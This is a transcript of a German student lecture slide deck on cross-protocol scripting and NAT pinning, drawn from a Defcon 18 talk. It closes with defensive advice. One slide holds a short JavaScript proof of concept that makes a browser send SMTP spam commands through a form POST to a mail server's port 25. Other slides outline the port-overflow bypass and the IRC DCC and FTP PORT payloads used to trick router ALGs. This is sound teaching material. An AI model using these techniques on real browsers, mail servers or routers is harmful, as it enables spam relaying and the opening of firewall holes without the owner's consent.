Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein.

Ähnliche Präsentationen


Präsentation zum Thema: "IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein."—  Präsentation transkript:

1 IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein

2 Motivation Defcon 18 Videos auf Youtube How i met your Girlfriend Von Samy Kamkar Inhalt: PHP 160 Bit Session Variable Reduktion auf 40 Bit Cross Protocol Scripitng (XPS) NAT Pinning Webkit Integer overflow Geolocation via XXXSS

3 Cross Protocol Scripting (XPS) HTTP Newline Protocol Browser ist HTTP Client \n Client HTTP Server auf Port 80, 443,8080, ???? Andere Newline Protokolle SMTP FTP IRC

4 Der Browser als beliebiger Client SMTP Zum versenden von Spam IRC Zum versenden von Spam -> NAT Pinning FTP -> NAT Pinning

5 Der Javascript Client doc = document.createElement(form); doc.setAttribute(name,x); doc.setAttribute(method,POST); //GET Funktioniert natürlich nicht doc.setAttribute(action,http://mail.fhstp.ac.at:25/); //Server+Port doc.setAttribute(enctype,multipart/form-data); //erhält newlines! payload = document.createElement(textarea); payload.setAttribute(name, C); // Der eigentliche Inhalt data = HELO\nMAIL FROM: \nRCPT TO: \nDATA\nSubject: Raketenfuzzys\nKeep up the good payload.setAttribute(value, data); payload.innerHTML = data; payload.innerText = data; doc.appendChild(palyoad); document.body.appendChild(doc); doc.submit(); //Abschicken

6 Demo

7 Webkit Integer Overflow IRC Port = = Browser check: If port != 6667 then connect(hostname, port) TCP/UDP Port nur 16 Bit groß 17. Bit wird einfach abgeschnitten!

8 NAT Pinning SOHO Router und Firewalls sind ALGs Inspizieren und Interpretieren Layer 7 Payload Beispiele: IRC/DCC: PRIVMSG target :DCC target $IP $PORT Netfilter IRC Conntrack FTP PORT Command PORT ip1.ip2.ip3.ip4.p1.p2 ? Implementationsabhängig!

9 Was lernen wir daraus Browser: Aktuellen Browser verwenden (patchen, auch Browser!) NoScript? Firewall: Regeln überdenken Brauche/habe ich ALG Funktionalität aktiviert? Host based Firewalls

10 Vielen Dank für Ihre Aufmerksamkeit!


Herunterladen ppt "IT Security Cross Protocol Scripting & NAT Pinning Emanuel Klein."

Ähnliche Präsentationen


Google-Anzeigen